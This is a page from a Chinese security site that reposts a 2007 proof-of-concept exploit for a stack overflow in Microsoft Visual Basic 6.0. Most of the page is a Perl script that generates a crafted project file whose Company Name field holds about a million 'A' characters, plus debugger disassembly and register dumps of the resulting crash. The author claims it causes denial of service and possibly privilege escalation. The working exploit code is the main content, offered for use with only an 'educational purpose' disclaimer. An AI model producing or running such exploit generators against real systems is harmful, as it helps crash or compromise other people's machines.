首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Microsoft Visual Basic 6.0 Project (Company Name) Stack overflow PoC 来源：umz32.dll[at]gmail.com 作者：UmZ 发布时间：2007-05-25   #!/usr/local/bin/perl #Discovered By UmZ (Umair Manzoor) #comments are welcome at umz32.dll[at]gmail.com #Dated 23-02-2007 #Time : 02:00 AM PST # #Visual Basic Project (Company Name) Stack Overflow #Affected Version  : Tested on Visual basic 6 #Threats : DoS, Previlidges Escilation (System become unstable for more then 40 minutes and so) #From : Local system # #Actually Exception occur again and again and again make 100% usage of CPU # # #*The vulnerability would not effect until the project description (Project Property page and select Company Name) has been opened up to view. # #*When binary file is generated with crafted Visual basic project it would not contain any details of vendor and other information. #Details: #       Owned Registers are ESI and EDI. Compnay name is dumped at Memory Address of : 04520020. Due to stack overflow USER32 stuck into loop (that last #       for more then 30 minutes in testing). #         # The CPU usuage becomes 100% causing the system to become unstable and can crash the OS if enduser is on low system memory. This vulnerability can #       be exploit to cause DOS or Previledge escilation. UNICODE exploitation must be implemented in order to exploit this vulnerability. # The generated Binary File is also attached which cann't display any of details of vendor information in EXE format (due to overflow). # #Debug Details: #      This is the debug details which clearly mention the loop in which exception got stuck, causing it to occur again and again # #77D8D96F   837D F8 00       CMP DWORD PTR SS:[EBP-8],0 #77D8D973   74 08            JE SHORT USER32.77D8D97D #77D8D975   3C 20            CMP AL,20 #77D8D977   74 04            JE SHORT USER32.77D8D97D #77D8D979   3C 09            CMP AL,9 #77D8D97B   75 2C            JNZ SHORT USER32.77D8D9A9 #77D8D97D   3C 0D            CMP AL,0D #77D8D97F   74 28            JE SHORT USER32.77D8D9A9 #77D8D981   50               PUSH EAX #77D8D982   53               PUSH EBX #77D8D983   E8 68FAFFFF      CALL USER32.77D8D3F0 #77D8D988   85C0             TEST EAX,EAX #77D8D98A   75 1D            JNZ SHORT USER32.77D8D9A9 #77D8D98C   47               INC EDI #77D8D98D   8A07             MOV AL,BYTE PTR DS:[EDI] #77D8D98F   3C 20            CMP AL,20 #77D8D991   74 04            JE SHORT USER32.77D8D997 #77D8D993   3C 09            CMP AL,9 #77D8D995   75 07            JNZ SHORT USER32.77D8D99E #77D8D997   C745 F8 01000000 MOV DWORD PTR SS:[EBP-8],1 #77D8D99E   807F FF 0A       CMP BYTE PTR DS:[EDI-1],0A #77D8D9A2   74 05            JE SHORT USER32.77D8D9A9 #77D8D9A4   3B7D 10          CMP EDI,DWORD PTR SS:[EBP+10] #77D8D9A7  ^72 C6            JB SHORT USER32.77D8D96F # # #Values of Register are as follows: #EAX 00000041 #ECX 09E0C300 #EDX 00150608 #EBX 001DC0C0 #ESP 0013E900 #EBP 0013E914 #ESI 04520020 ASCII #"AAAAAAAAAAAAAAAAA......... truncated #EDI 045E61D0 ASCII #"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... truncated #EIP 77D8D96F USER32.77D8D96F # # #     Disclaimer: This Proof of concept exploit is for educational purpose only. #         Please do not use it against any system without prior permission. #          You are responsible for yourself for what you do with this code. # This exploit is just POC, it will generate the crafted VB project. print("\nVisual Basic Company Name Stack overflow"); print("\nAffected Version  : Tested on Visual basic 6"); print("\nThreats : DoS, Previlidges Escilation"); print("\nFrom : Local system"); print("\n----------------------------------------------"); print("\nDiscovered & Coded by UmZ"); print("\numz32.dll[at]gmail.com"); open (MYFILE, '>>Form2.frm'); print MYFILE "VERSION 5.00\n"; print MYFILE "Begin VB.Form Form1\n"; print MYFILE q(Caption         =   "Form1"); print MYFILE "\nClientHeight    =   3495\n"; print MYFILE "ClientLeft      =   60\n"; print MYFILE "ClientTop       =   345\n"; print MYFILE "ClientWidth     =   4680\n"; print MYFILE q(LinkTopic       =   "Form1"); print MYFILE "\nScaleHeight     =   3495\n"; print MYFILE "ScaleWidth      =   4680\n"; print MYFILE "StartUpPosition =   3  'Windows Default\n"; print MYFILE "Begin VB.CommandButton Command2\n"; print MYFILE q(Caption         =   "write"); print MYFILE "\nHeight          =   495\n"; print MYFILE "Left            =   2400\n"; print MYFILE "TabIndex        =   2\n"; print MYFILE "Top             =   2640\n"; print MYFILE "Width           =   1935\n"; print MYFILE "End\n"; print MYFILE "Begin VB.TextBox Text1\n"; print MYFILE "Height          =   2175\n"; print MYFILE "Left            =   480\n"; print MYFILE "MultiLine       =   -1  'True\n"; print MYFILE "TabIndex        =   1\n"; print MYFILE q(Text            =   "Form1.frx":0000); print MYFILE "\nTop             =   360\n"; print MYFILE "Width           =   3855\n"; print MYFILE "End\n"; print MYFILE "Begin VB.CommandButton Command1\n"; print MYFILE q(Caption         =   "read"); print MYFILE "\nHeight          =   495\n"; print MYFILE "Left            =   480\n"; print MYFILE "TabIndex        =   0\n"; print MYFILE "Top             =   2640\n"; print MYFILE "Width           =   1935\n"; print MYFILE "End\n"; print MYFILE "End\n"; print MYFILE q(Attribute VB_Name = "Form1"); print MYFILE "\nAttribute VB_GlobalNameSpace = False\n"; print MYFILE "Attribute VB_Creatable = False\n"; print MYFILE "Attribute VB_PredeclaredId = True\n"; print MYFILE "Attribute VB_Exposed = False\n"; close (MYFILE); open (MYFILE, '>>vuln2.vbp'); print MYFILE "Type=Exe\n"; print MYFILE "Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINDOWS\\system32\\stdole2.tlb#OLE Automation\n"; print MYFILE "Reference=*\\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#..\\..\\..\\..\\WINDOWS\\system32\\scrrun.dll#Microsoft Scripting Runtime\n"; print MYFILE "Form=Form2.frm\n"; print MYFILE q(Startup="Form2"); print MYFILE "\nHelpFile=".q(""); print MYFILE "\nCommand32=".q(""); print MYFILE "\nName=".q("Project1"); print MYFILE "\nHelpContextID=".q("0"); #print MYFILE "\nDescription=".q(")."A" x1037690 .q("); print MYFILE "\nCompatibleMode=".q("0"); print MYFILE "\nMajorVer=1"; print MYFILE "\nMinorVer=0"; print MYFILE "\nRevisionVer=0"; print MYFILE "\nAutoIncrementVer=0"; print MYFILE "\nServerSupportFiles=0"; print MYFILE "\nVersionCompanyName=".q(")."A" x1037690 .q("); print MYFILE "\nCompilationType=0"; print MYFILE "\nOptimizationType=0"; print MYFILE "\nFavorPentiumPro(tm)=0"; print MYFILE "\nCodeViewDebugInfo=0"; print MYFILE "\nNoAliasing=0"; print MYFILE "\nBoundsCheck=0"; print MYFILE "\nOverflowCheck=0"; print MYFILE "\nFlPointCheck=0"; print MYFILE "\nFDIVCheck=0"; print MYFILE "\nUnroundedFP=0"; print MYFILE "\nStartMode=0"; print MYFILE "\nUnattended=0"; print MYFILE "\nRetained=0"; print MYFILE "\nThreadPerObject=0"; print MYFILE "\nMaxNumberOfThreads=1"; print MYFILE "\n[MS Transaction Server]"; print MYFILE "\nAutoRefresh=1"; close (MYFILE); print("\n\nCrafted Project has been generated!!!\n\n");   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·MagicISO <= 5.4 (build239) .cu ·Microsoft Visual Basic 6.0 Pro ·Dokeos <= 1.8.0 (my_progress.p ·UltraISO <= 8.6.2.2011 (Cue/Bi ·LeadTools ISIS Control (ltisi1 ·Dokeos <= 1.6.5 (courseLog.php ·KSign KSignSWAT <= 2.0.3.3 Act ·cpCommerce <= 1.1.0 (category. ·Virtual CD 9.0.0.2 (vc9api.DLL ·UltraISO <= 8.6.2.2011 (Cue/Bi ·Pegasus ImagN ActiveX Control ·Fundanemt <= 2.2.0 (spellcheck   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved